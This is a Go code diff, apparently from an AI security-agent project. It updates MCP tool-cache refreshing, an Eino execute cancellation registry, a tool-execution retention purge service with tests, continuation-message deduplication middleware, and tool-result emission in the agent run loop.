resultChan <- countResult{name: n, count: -1} // -1 表示使用旧值
|
resultChan <- countResult{name: n, count: -1}
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -925,33 +1075,21 @@ func (m *ExternalMCPManager) refreshToolCache(name string, client ExternalMCPCli
|
|||||||
if !client.IsConnected() {
|
if !client.IsConnected() {
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
if client.GetStatus() == "error" {
|
||||||
// 检查状态,如果是error状态,不更新缓存
|
|
||||||
status := client.GetStatus()
|
|
||||||
if status == "error" {
|
|
||||||
m.logger.Debug("跳过刷新工具列表缓存(连接失败)",
|
m.logger.Debug("跳过刷新工具列表缓存(连接失败)",
|
||||||
zap.String("name", name),
|
zap.String("name", name),
|
||||||
zap.String("status", status),
|
|
||||||
)
|
)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
// 使用较短的超时时间(5秒)
|
ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
|
||||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
|
||||||
defer cancel()
|
defer cancel()
|
||||||
|
if _, err := m.listToolsDeduped(ctx, name, client); err != nil {
|
||||||
tools, err := client.ListTools(ctx)
|
|
||||||
if err != nil {
|
|
||||||
m.logger.Debug("刷新工具列表缓存失败",
|
m.logger.Debug("刷新工具列表缓存失败",
|
||||||
zap.String("name", name),
|
zap.String("name", name),
|
||||||
zap.Error(err),
|
zap.Error(err),
|
||||||
)
|
)
|
||||||
// 刷新失败时不更新缓存,保留旧缓存(如果有)
|
|
||||||
return
|
|
||||||
}
|
}
|
||||||
|
|
||||||
// 使用统一的缓存更新方法
|
|
||||||
m.updateToolCache(name, tools)
|
|
||||||
}
|
}
|
||||||
|
|
||||||
// startToolCountRefresh 启动后台刷新工具数量的goroutine
|
// startToolCountRefresh 启动后台刷新工具数量的goroutine
|
||||||
@@ -959,7 +1097,7 @@ func (m *ExternalMCPManager) startToolCountRefresh() {
|
|||||||
m.refreshWg.Add(1)
|
m.refreshWg.Add(1)
|
||||||
go func() {
|
go func() {
|
||||||
defer m.refreshWg.Done()
|
defer m.refreshWg.Done()
|
||||||
ticker := time.NewTicker(10 * time.Second) // 每10秒刷新一次
|
ticker := time.NewTicker(externalToolCountRefreshInterval)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// 立即执行一次刷新
|
// 立即执行一次刷新
|
||||||
@@ -1075,6 +1213,8 @@ func (m *ExternalMCPManager) connectClient(name string, serverCfg config.Externa
|
|||||||
zap.String("name", name),
|
zap.String("name", name),
|
||||||
)
|
)
|
||||||
|
|
||||||
|
m.onClientConnected(name)
|
||||||
|
|
||||||
// 连接成功,触发工具数量刷新和工具列表缓存刷新
|
// 连接成功,触发工具数量刷新和工具列表缓存刷新
|
||||||
m.triggerToolCountRefresh()
|
m.triggerToolCountRefresh()
|
||||||
m.mu.RLock()
|
m.mu.RLock()
|
||||||
@@ -1159,6 +1299,7 @@ func (m *ExternalMCPManager) StopAll() {
|
|||||||
for name, client := range m.clients {
|
for name, client := range m.clients {
|
||||||
client.Close()
|
client.Close()
|
||||||
delete(m.clients, name)
|
delete(m.clients, name)
|
||||||
|
m.clearReconnectState(name)
|
||||||
}
|
}
|
||||||
|
|
||||||
// 清理所有工具数量缓存
|
// 清理所有工具数量缓存
|
||||||
@@ -1168,7 +1309,7 @@ func (m *ExternalMCPManager) StopAll() {
|
|||||||
|
|
||||||
// 清理所有工具列表缓存
|
// 清理所有工具列表缓存
|
||||||
m.toolCacheMu.Lock()
|
m.toolCacheMu.Lock()
|
||||||
m.toolCache = make(map[string][]Tool)
|
m.toolCache = make(map[string]toolListCacheEntry)
|
||||||
m.toolCacheMu.Unlock()
|
m.toolCacheMu.Unlock()
|
||||||
|
|
||||||
// 停止后台刷新(使用 select 避免重复关闭 channel)
|
// 停止后台刷新(使用 select 避免重复关闭 channel)
|
||||||
|
|||||||
@@ -11,7 +11,16 @@ type ToolRunRegistry interface {
|
|||||||
UnregisterRunningTool(conversationID, executionID string)
|
UnregisterRunningTool(conversationID, executionID string)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// EinoExecuteRunRegistry 登记进行中的 Eino filesystem execute,供「中断并继续」终止 amass 等长命令。
|
||||||
|
type EinoExecuteRunRegistry interface {
|
||||||
|
RegisterActiveEinoExecute(conversationID string, cancel context.CancelFunc)
|
||||||
|
UnregisterActiveEinoExecute(conversationID string)
|
||||||
|
AbortActiveEinoExecute(conversationID, note string) bool
|
||||||
|
TakeEinoExecuteAbortNote(conversationID string) string
|
||||||
|
}
|
||||||
|
|
||||||
type toolRunRegistryCtxKey struct{}
|
type toolRunRegistryCtxKey struct{}
|
||||||
|
type einoExecuteRunRegistryCtxKey struct{}
|
||||||
type mcpConversationIDCtxKey struct{}
|
type mcpConversationIDCtxKey struct{}
|
||||||
|
|
||||||
// WithToolRunRegistry 将登记器注入 ctx(Eino / 原生 Agent 任务 ctx)。
|
// WithToolRunRegistry 将登记器注入 ctx(Eino / 原生 Agent 任务 ctx)。
|
||||||
@@ -31,6 +40,23 @@ func ToolRunRegistryFromContext(ctx context.Context) ToolRunRegistry {
|
|||||||
return v
|
return v
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// WithEinoExecuteRunRegistry 将 Eino execute 取消登记器注入 ctx。
|
||||||
|
func WithEinoExecuteRunRegistry(ctx context.Context, reg EinoExecuteRunRegistry) context.Context {
|
||||||
|
if ctx == nil || reg == nil {
|
||||||
|
return ctx
|
||||||
|
}
|
||||||
|
return context.WithValue(ctx, einoExecuteRunRegistryCtxKey{}, reg)
|
||||||
|
}
|
||||||
|
|
||||||
|
// EinoExecuteRunRegistryFromContext 取出 Eino execute 登记器(无则 nil)。
|
||||||
|
func EinoExecuteRunRegistryFromContext(ctx context.Context) EinoExecuteRunRegistry {
|
||||||
|
if ctx == nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
v, _ := ctx.Value(einoExecuteRunRegistryCtxKey{}).(EinoExecuteRunRegistry)
|
||||||
|
return v
|
||||||
|
}
|
||||||
|
|
||||||
// WithMCPConversationID 将对话 ID 注入 ctx,供 CallTool 内与 executionId 关联。
|
// WithMCPConversationID 将对话 ID 注入 ctx,供 CallTool 内与 executionId 关联。
|
||||||
func WithMCPConversationID(ctx context.Context, conversationID string) context.Context {
|
func WithMCPConversationID(ctx context.Context, conversationID string) context.Context {
|
||||||
if ctx == nil {
|
if ctx == nil {
|
||||||
|
|||||||
@@ -21,6 +21,7 @@ import (
|
|||||||
// MonitorStorage 监控数据存储接口
|
// MonitorStorage 监控数据存储接口
|
||||||
type MonitorStorage interface {
|
type MonitorStorage interface {
|
||||||
SaveToolExecution(exec *ToolExecution) error
|
SaveToolExecution(exec *ToolExecution) error
|
||||||
|
UpdateToolExecutionResult(id string, result *ToolResult) error
|
||||||
LoadToolExecutions() ([]*ToolExecution, error)
|
LoadToolExecutions() ([]*ToolExecution, error)
|
||||||
GetToolExecution(id string) (*ToolExecution, error)
|
GetToolExecution(id string) (*ToolExecution, error)
|
||||||
SaveToolStats(toolName string, stats *ToolStats) error
|
SaveToolStats(toolName string, stats *ToolStats) error
|
||||||
@@ -963,6 +964,26 @@ func (s *Server) RecordCompletedToolInvocation(toolName string, args map[string]
|
|||||||
return executionID
|
return executionID
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// UpdateToolExecutionResult 将监控库中的工具结果更新为送入模型的展示正文(如 reduction 后的 persisted-output)。
|
||||||
|
func (s *Server) UpdateToolExecutionResult(executionID string, result *ToolResult) error {
|
||||||
|
if s == nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
executionID = strings.TrimSpace(executionID)
|
||||||
|
if executionID == "" || result == nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
s.mu.Lock()
|
||||||
|
if exec, ok := s.executions[executionID]; ok && exec != nil {
|
||||||
|
exec.Result = result
|
||||||
|
}
|
||||||
|
s.mu.Unlock()
|
||||||
|
if s.storage != nil {
|
||||||
|
return s.storage.UpdateToolExecutionResult(executionID, result)
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
// cleanupOldExecutions 清理旧的执行记录,防止内存无限增长
|
// cleanupOldExecutions 清理旧的执行记录,防止内存无限增长
|
||||||
func (s *Server) cleanupOldExecutions() {
|
func (s *Server) cleanupOldExecutions() {
|
||||||
if len(s.executions) <= s.maxExecutionsInMemory {
|
if len(s.executions) <= s.maxExecutionsInMemory {
|
||||||
|
|||||||
@@ -0,0 +1,71 @@
|
|||||||
|
package monitor
|
||||||
|
|
||||||
|
import (
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"cyberstrike-ai/internal/config"
|
||||||
|
"cyberstrike-ai/internal/database"
|
||||||
|
|
||||||
|
"go.uber.org/zap"
|
||||||
|
)
|
||||||
|
|
||||||
|
const retentionPurgeInterval = time.Hour
|
||||||
|
|
||||||
|
// Service manages MCP tool execution monitor retention.
|
||||||
|
type Service struct {
|
||||||
|
db *database.DB
|
||||||
|
cfg *config.Config
|
||||||
|
logger *zap.Logger
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewService creates a monitor retention service.
|
||||||
|
func NewService(db *database.DB, cfg *config.Config, logger *zap.Logger) *Service {
|
||||||
|
return &Service{db: db, cfg: cfg, logger: logger}
|
||||||
|
}
|
||||||
|
|
||||||
|
// RetentionDays returns configured retention; 0 means keep forever.
|
||||||
|
func (s *Service) RetentionDays() int {
|
||||||
|
if s == nil || s.cfg == nil {
|
||||||
|
return config.MonitorConfig{}.RetentionDaysEffective()
|
||||||
|
}
|
||||||
|
return s.cfg.Monitor.RetentionDaysEffective()
|
||||||
|
}
|
||||||
|
|
||||||
|
// PurgeExpired deletes tool execution rows older than retention_days when configured.
|
||||||
|
func (s *Service) PurgeExpired() {
|
||||||
|
if s == nil || s.db == nil || s.cfg == nil {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
days := s.cfg.Monitor.RetentionDaysEffective()
|
||||||
|
if days <= 0 {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
cutoff := time.Now().AddDate(0, 0, -days)
|
||||||
|
n, err := s.db.PurgeToolExecutionsBefore(cutoff)
|
||||||
|
if err != nil {
|
||||||
|
if s.logger != nil {
|
||||||
|
s.logger.Warn("清理过期 MCP 执行记录失败", zap.Error(err))
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if n > 0 && s.logger != nil {
|
||||||
|
s.logger.Info("已清理过期 MCP 执行记录", zap.Int64("deleted", n), zap.Int("retention_days", days))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// StartRetentionLoop periodically purges expired tool execution rows.
|
||||||
|
func StartRetentionLoop(s *Service, logger *zap.Logger) {
|
||||||
|
if s == nil {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
go func() {
|
||||||
|
ticker := time.NewTicker(retentionPurgeInterval)
|
||||||
|
defer ticker.Stop()
|
||||||
|
for range ticker.C {
|
||||||
|
s.PurgeExpired()
|
||||||
|
if logger != nil {
|
||||||
|
logger.Debug("monitor retention tick completed")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}()
|
||||||
|
}
|
||||||
@@ -0,0 +1,94 @@
|
|||||||
|
package monitor
|
||||||
|
|
||||||
|
import (
|
||||||
|
"path/filepath"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"cyberstrike-ai/internal/config"
|
||||||
|
"cyberstrike-ai/internal/database"
|
||||||
|
"cyberstrike-ai/internal/mcp"
|
||||||
|
|
||||||
|
"go.uber.org/zap"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestServicePurgeExpired_respectsZeroRetention(t *testing.T) {
|
||||||
|
dbPath := filepath.Join(t.TempDir(), "monitor.db")
|
||||||
|
db, err := database.NewDB(dbPath, zap.NewNop())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("NewDB: %v", err)
|
||||||
|
}
|
||||||
|
defer db.Close()
|
||||||
|
|
||||||
|
exec := &mcp.ToolExecution{
|
||||||
|
ID: "ancient",
|
||||||
|
ToolName: "curl::get",
|
||||||
|
Arguments: map[string]interface{}{},
|
||||||
|
Status: "completed",
|
||||||
|
StartTime: mustParseTime(t, "2020-01-01T00:00:00Z"),
|
||||||
|
}
|
||||||
|
if err := db.SaveToolExecution(exec); err != nil {
|
||||||
|
t.Fatalf("SaveToolExecution: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
zero := 0
|
||||||
|
svc := NewService(db, &config.Config{
|
||||||
|
Monitor: config.MonitorConfig{RetentionDays: &zero},
|
||||||
|
}, zap.NewNop())
|
||||||
|
svc.PurgeExpired()
|
||||||
|
|
||||||
|
if _, err := db.GetToolExecution("ancient"); err != nil {
|
||||||
|
t.Fatalf("record should remain when retention_days=0: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestServicePurgeExpired_deletesOldRows(t *testing.T) {
|
||||||
|
dbPath := filepath.Join(t.TempDir(), "monitor.db")
|
||||||
|
db, err := database.NewDB(dbPath, zap.NewNop())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("NewDB: %v", err)
|
||||||
|
}
|
||||||
|
defer db.Close()
|
||||||
|
|
||||||
|
exec := &mcp.ToolExecution{
|
||||||
|
ID: "ancient",
|
||||||
|
ToolName: "curl::get",
|
||||||
|
Arguments: map[string]interface{}{},
|
||||||
|
Status: "completed",
|
||||||
|
StartTime: mustParseTime(t, "2020-01-01T00:00:00Z"),
|
||||||
|
}
|
||||||
|
if err := db.SaveToolExecution(exec); err != nil {
|
||||||
|
t.Fatalf("SaveToolExecution: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
days := 90
|
||||||
|
svc := NewService(db, &config.Config{
|
||||||
|
Monitor: config.MonitorConfig{RetentionDays: &days},
|
||||||
|
}, zap.NewNop())
|
||||||
|
svc.PurgeExpired()
|
||||||
|
|
||||||
|
if _, err := db.GetToolExecution("ancient"); err == nil {
|
||||||
|
t.Fatal("record should be purged when older than retention_days")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRetentionDaysEffective_defaults(t *testing.T) {
|
||||||
|
got := config.MonitorConfig{}.RetentionDaysEffective()
|
||||||
|
if got != 90 {
|
||||||
|
t.Fatalf("default = %d, want 90", got)
|
||||||
|
}
|
||||||
|
zero := 0
|
||||||
|
cfg := config.MonitorConfig{RetentionDays: &zero}
|
||||||
|
if cfg.RetentionDaysEffective() != 0 {
|
||||||
|
t.Fatalf("zero = %d, want 0", cfg.RetentionDaysEffective())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func mustParseTime(t *testing.T, value string) time.Time {
|
||||||
|
t.Helper()
|
||||||
|
parsed, err := time.Parse(time.RFC3339, value)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("parse time: %v", err)
|
||||||
|
}
|
||||||
|
return parsed
|
||||||
|
}
|
||||||
@@ -0,0 +1,104 @@
|
|||||||
|
package multiagent
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
"github.com/cloudwego/eino/adk"
|
||||||
|
"github.com/cloudwego/eino/schema"
|
||||||
|
"go.uber.org/zap"
|
||||||
|
)
|
||||||
|
|
||||||
|
// continuationSessionMarker matches Cursor / IDE session-resume user injections.
|
||||||
|
const continuationSessionMarker = "This session is being continued from a previous conversation"
|
||||||
|
|
||||||
|
// continuationUserDedupMiddleware keeps only the latest session-resume user message when
|
||||||
|
// multiple continuation injections were stacked (e.g. after repeated out-of-context resumes).
|
||||||
|
type continuationUserDedupMiddleware struct {
|
||||||
|
adk.BaseChatModelAgentMiddleware
|
||||||
|
logger *zap.Logger
|
||||||
|
phase string
|
||||||
|
}
|
||||||
|
|
||||||
|
func newContinuationUserDedupMiddleware(logger *zap.Logger, phase string) adk.ChatModelAgentMiddleware {
|
||||||
|
return &continuationUserDedupMiddleware{logger: logger, phase: phase}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *continuationUserDedupMiddleware) BeforeModelRewriteState(
|
||||||
|
ctx context.Context,
|
||||||
|
state *adk.ChatModelAgentState,
|
||||||
|
mc *adk.ModelContext,
|
||||||
|
) (context.Context, *adk.ChatModelAgentState, error) {
|
||||||
|
_ = mc
|
||||||
|
if m == nil || state == nil || len(state.Messages) == 0 {
|
||||||
|
return ctx, state, nil
|
||||||
|
}
|
||||||
|
deduped, dropped := dedupContinuationUserMessages(state.Messages)
|
||||||
|
if dropped == 0 {
|
||||||
|
return ctx, state, nil
|
||||||
|
}
|
||||||
|
if m.logger != nil {
|
||||||
|
m.logger.Info("eino continuation user messages deduplicated",
|
||||||
|
zap.String("phase", m.phase),
|
||||||
|
zap.Int("dropped", dropped),
|
||||||
|
zap.Int("messages_before", len(state.Messages)),
|
||||||
|
zap.Int("messages_after", len(deduped)),
|
||||||
|
)
|
||||||
|
}
|
||||||
|
out := *state
|
||||||
|
out.Messages = deduped
|
||||||
|
return ctx, &out, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func adkUserMessageText(msg adk.Message) string {
|
||||||
|
if msg == nil {
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
var b strings.Builder
|
||||||
|
if s := strings.TrimSpace(msg.Content); s != "" {
|
||||||
|
b.WriteString(s)
|
||||||
|
}
|
||||||
|
for _, part := range msg.UserInputMultiContent {
|
||||||
|
if part.Type == schema.ChatMessagePartTypeText {
|
||||||
|
if s := strings.TrimSpace(part.Text); s != "" {
|
||||||
|
if b.Len() > 0 {
|
||||||
|
b.WriteByte('\n')
|
||||||
|
}
|
||||||
|
b.WriteString(s)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
func isContinuationUserMessage(msg adk.Message) bool {
|
||||||
|
if msg == nil || msg.Role != schema.User {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
return strings.Contains(adkUserMessageText(msg), continuationSessionMarker)
|
||||||
|
}
|
||||||
|
|
||||||
|
func dedupContinuationUserMessages(msgs []adk.Message) ([]adk.Message, int) {
|
||||||
|
lastIdx := -1
|
||||||
|
contCount := 0
|
||||||
|
for i, msg := range msgs {
|
||||||
|
if !isContinuationUserMessage(msg) {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
contCount++
|
||||||
|
lastIdx = i
|
||||||
|
}
|
||||||
|
if contCount <= 1 {
|
||||||
|
return msgs, 0
|
||||||
|
}
|
||||||
|
out := make([]adk.Message, 0, len(msgs)-(contCount-1))
|
||||||
|
dropped := 0
|
||||||
|
for i, msg := range msgs {
|
||||||
|
if isContinuationUserMessage(msg) && i != lastIdx {
|
||||||
|
dropped++
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
out = append(out, msg)
|
||||||
|
}
|
||||||
|
return out, dropped
|
||||||
|
}
|
||||||
@@ -0,0 +1,65 @@
|
|||||||
|
package multiagent
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
|
||||||
|
"github.com/cloudwego/eino/adk"
|
||||||
|
"github.com/cloudwego/eino/schema"
|
||||||
|
)
|
||||||
|
|
||||||
|
func continuationUser(text string) adk.Message {
|
||||||
|
return &schema.Message{
|
||||||
|
Role: schema.User,
|
||||||
|
UserInputMultiContent: []schema.MessageInputPart{
|
||||||
|
{Type: schema.ChatMessagePartTypeText, Text: continuationSessionMarker + "\n" + text},
|
||||||
|
{Type: schema.ChatMessagePartTypeText, Text: "Please continue the conversation from where we left it off."},
|
||||||
|
},
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestDedupContinuationUserMessages_KeepsLatest(t *testing.T) {
|
||||||
|
msgs := []adk.Message{
|
||||||
|
continuationUser("summary old"),
|
||||||
|
schema.UserMessage("real task"),
|
||||||
|
continuationUser("summary new"),
|
||||||
|
}
|
||||||
|
out, dropped := dedupContinuationUserMessages(msgs)
|
||||||
|
if dropped != 1 {
|
||||||
|
t.Fatalf("dropped=%d want 1", dropped)
|
||||||
|
}
|
||||||
|
if len(out) != 2 {
|
||||||
|
t.Fatalf("len=%d want 2", len(out))
|
||||||
|
}
|
||||||
|
if out[0].Role != schema.User || adkUserMessageText(out[0]) != "real task" {
|
||||||
|
t.Fatalf("first should remain real task, got %q", adkUserMessageText(out[0]))
|
||||||
|
}
|
||||||
|
if !strings.Contains(adkUserMessageText(out[1]), "summary new") {
|
||||||
|
t.Fatalf("latest continuation not kept: %q", adkUserMessageText(out[1]))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestDedupContinuationUserMessages_NoOpSingle(t *testing.T) {
|
||||||
|
msgs := []adk.Message{continuationUser("only"), schema.UserMessage("task")}
|
||||||
|
out, dropped := dedupContinuationUserMessages(msgs)
|
||||||
|
if dropped != 0 || len(out) != 2 {
|
||||||
|
t.Fatalf("unexpected change dropped=%d len=%d", dropped, len(out))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestContinuationUserDedupMiddleware(t *testing.T) {
|
||||||
|
mw := newContinuationUserDedupMiddleware(nil, "test")
|
||||||
|
state := &adk.ChatModelAgentState{Messages: []adk.Message{
|
||||||
|
continuationUser("old"),
|
||||||
|
continuationUser("new"),
|
||||||
|
schema.UserMessage("task"),
|
||||||
|
}}
|
||||||
|
_, out, err := mw.(*continuationUserDedupMiddleware).BeforeModelRewriteState(context.Background(), state, nil)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
if len(out.Messages) != 2 {
|
||||||
|
t.Fatalf("want 2 messages after dedup, got %d", len(out.Messages))
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -88,6 +88,7 @@ type einoADKRunLoopArgs struct {
|
|||||||
// 在完成时写入 MCP 监控;execute 仍由 eino_execute_monitor 记录,此处跳过。
|
// 在完成时写入 MCP 监控;execute 仍由 eino_execute_monitor 记录,此处跳过。
|
||||||
FilesystemMonitorAgent *agent.Agent
|
FilesystemMonitorAgent *agent.Agent
|
||||||
FilesystemMonitorRecord einomcp.ExecutionRecorder
|
FilesystemMonitorRecord einomcp.ExecutionRecorder
|
||||||
|
MCPExecutionBinder *MCPExecutionBinder
|
||||||
|
|
||||||
// ToolInvokeNotify 与 einomcp.ToolsFromDefinitions 共享:run loop 在迭代前 Set,MCP 桥 Fire 以补全 tool_result。
|
// ToolInvokeNotify 与 einomcp.ToolsFromDefinitions 共享:run loop 在迭代前 Set,MCP 桥 Fire 以补全 tool_result。
|
||||||
ToolInvokeNotify *einomcp.ToolInvokeNotifyHolder
|
ToolInvokeNotify *einomcp.ToolInvokeNotifyHolder
|
||||||
@@ -176,6 +177,7 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
lastPlanExecuteExecutor = ""
|
lastPlanExecuteExecutor = ""
|
||||||
var reasoningStreamSeq int64
|
var reasoningStreamSeq int64
|
||||||
var einoSubReplyStreamSeq int64
|
var einoSubReplyStreamSeq int64
|
||||||
|
var mainResponseStreamSeq int64
|
||||||
toolEmitSeen := make(map[string]struct{})
|
toolEmitSeen := make(map[string]struct{})
|
||||||
var einoMainRound int
|
var einoMainRound int
|
||||||
var einoLastAgent string
|
var einoLastAgent string
|
||||||
@@ -284,53 +286,63 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
executeStdoutDupMu.Unlock()
|
executeStdoutDupMu.Unlock()
|
||||||
}
|
}
|
||||||
|
|
||||||
var toolResultSent sync.Map // toolCallID -> struct{};与 ADK Tool 消息去重,避免 bridge 与事件流各推一次
|
var toolResultSent sync.Map // toolCallID -> struct{};ADK Tool 事件去重(权威正文来自 reduction 处理后的 agent 上下文)
|
||||||
if args.ToolInvokeNotify != nil {
|
tryEmitToolResultProgress := func(toolName, content, toolCallID string, isErr bool, agentName string) {
|
||||||
args.ToolInvokeNotify.Set(func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error) {
|
if progress == nil {
|
||||||
tid := strings.TrimSpace(toolCallID)
|
return
|
||||||
removePendingByID(tid)
|
}
|
||||||
if tid == "" || progress == nil {
|
toolName = strings.TrimSpace(toolName)
|
||||||
return
|
if toolName == "" {
|
||||||
|
toolName = "unknown"
|
||||||
|
}
|
||||||
|
preview := content
|
||||||
|
if len(preview) > 200 {
|
||||||
|
preview = preview[:200] + "..."
|
||||||
|
}
|
||||||
|
data := map[string]interface{}{
|
||||||
|
"toolName": toolName,
|
||||||
|
"success": !isErr,
|
||||||
|
"isError": isErr,
|
||||||
|
"result": content,
|
||||||
|
"resultPreview": preview,
|
||||||
|
"conversationId": conversationID,
|
||||||
|
"einoAgent": agentName,
|
||||||
|
"einoRole": einoRoleTag(agentName),
|
||||||
|
"source": "eino",
|
||||||
|
}
|
||||||
|
tid := strings.TrimSpace(toolCallID)
|
||||||
|
if tid == "" {
|
||||||
|
if inferred, ok := popNextPendingForAgent(agentName); ok {
|
||||||
|
tid = inferred.ToolCallID
|
||||||
|
} else if inferred, ok := popNextPendingForAgent(orchestratorName); ok {
|
||||||
|
tid = inferred.ToolCallID
|
||||||
|
} else if inferred, ok := popNextPendingForAgent(""); ok {
|
||||||
|
tid = inferred.ToolCallID
|
||||||
|
} else if inferred, ok := popAnyPending(); ok {
|
||||||
|
tid = inferred.ToolCallID
|
||||||
}
|
}
|
||||||
|
}
|
||||||
|
if tid != "" {
|
||||||
|
removePendingByID(tid)
|
||||||
if _, loaded := toolResultSent.LoadOrStore(tid, struct{}{}); loaded {
|
if _, loaded := toolResultSent.LoadOrStore(tid, struct{}{}); loaded {
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
isErr := !success || invokeErr != nil
|
data["toolCallId"] = tid
|
||||||
body := content
|
toolCallID = tid
|
||||||
if invokeErr != nil {
|
}
|
||||||
// 保留已流式累计的 stdout(如 execute 超时前的一半输出),避免 tool_result 只剩错误串、模型与 UI 丢失上下文
|
recordPendingExecuteStdoutDup(toolName, content, isErr)
|
||||||
tail := friendlyEinoExecuteInvokeTail(invokeErr)
|
recordEinoADKFilesystemToolMonitor(args.FilesystemMonitorAgent, args.FilesystemMonitorRecord, toolName, toolCallID, runAccumulatedMsgs, content, isErr)
|
||||||
// execute 流式包装可能已把超时句写入 content(供 ADK tool 与流式 delta);勿重复拼接
|
if args.FilesystemMonitorAgent != nil && args.MCPExecutionBinder != nil {
|
||||||
if tail != "" && strings.Contains(content, tail) {
|
if execID := args.MCPExecutionBinder.ExecutionID(toolCallID); execID != "" {
|
||||||
body = content
|
args.FilesystemMonitorAgent.UpdateMCPExecutionDisplayResult(execID, content)
|
||||||
} else if strings.TrimSpace(content) != "" {
|
|
||||||
body = strings.TrimRight(content, "\n") + "\n\n" + tail
|
|
||||||
} else {
|
|
||||||
body = tail
|
|
||||||
}
|
|
||||||
isErr = true
|
|
||||||
}
|
}
|
||||||
recordPendingExecuteStdoutDup(toolName, body, isErr)
|
}
|
||||||
preview := body
|
progress("tool_result", fmt.Sprintf("工具结果 (%s)", toolName), data)
|
||||||
if len(preview) > 200 {
|
}
|
||||||
preview = preview[:200] + "..."
|
if args.ToolInvokeNotify != nil {
|
||||||
}
|
args.ToolInvokeNotify.Set(func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error) {
|
||||||
agentTag := strings.TrimSpace(einoAgent)
|
removePendingByID(strings.TrimSpace(toolCallID))
|
||||||
if agentTag == "" {
|
// tool_result 仅由下方 ADK schema.Tool 事件推送,正文与送入模型的上下文一致(含 reduction 截断)。
|
||||||
agentTag = orchestratorName
|
|
||||||
}
|
|
||||||
progress("tool_result", fmt.Sprintf("工具结果 (%s)", toolName), map[string]interface{}{
|
|
||||||
"toolName": toolName,
|
|
||||||
"success": !isErr,
|
|
||||||
"isError": isErr,
|
|
||||||
"result": body,
|
|
||||||
"resultPreview": preview,
|
|
||||||
"toolCallId": tid,
|
|
||||||
"conversationId": conversationID,
|
|
||||||
"einoAgent": agentTag,
|
|
||||||
"einoRole": einoRoleTag(agentTag),
|
|
||||||
"source": "eino",
|
|
||||||
})
|
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -371,6 +383,12 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
runner := adk.NewRunner(ctx, runnerCfg)
|
runner := adk.NewRunner(ctx, runnerCfg)
|
||||||
|
startRunnerIter := func(runMsgs []adk.Message) *adk.AsyncIterator[*adk.AgentEvent] {
|
||||||
|
if checkPointID != "" {
|
||||||
|
return runner.Run(ctx, runMsgs, adk.WithCheckPointID(checkPointID))
|
||||||
|
}
|
||||||
|
return runner.Run(ctx, runMsgs)
|
||||||
|
}
|
||||||
var iter *adk.AsyncIterator[*adk.AgentEvent]
|
var iter *adk.AsyncIterator[*adk.AgentEvent]
|
||||||
if cpStore != nil && checkPointID != "" {
|
if cpStore != nil && checkPointID != "" {
|
||||||
if _, existed, getErr := cpStore.Get(ctx, checkPointID); getErr != nil {
|
if _, existed, getErr := cpStore.Get(ctx, checkPointID); getErr != nil {
|
||||||
@@ -410,12 +428,9 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
if iter == nil {
|
if iter == nil {
|
||||||
if checkPointID != "" {
|
iter = startRunnerIter(msgs)
|
||||||
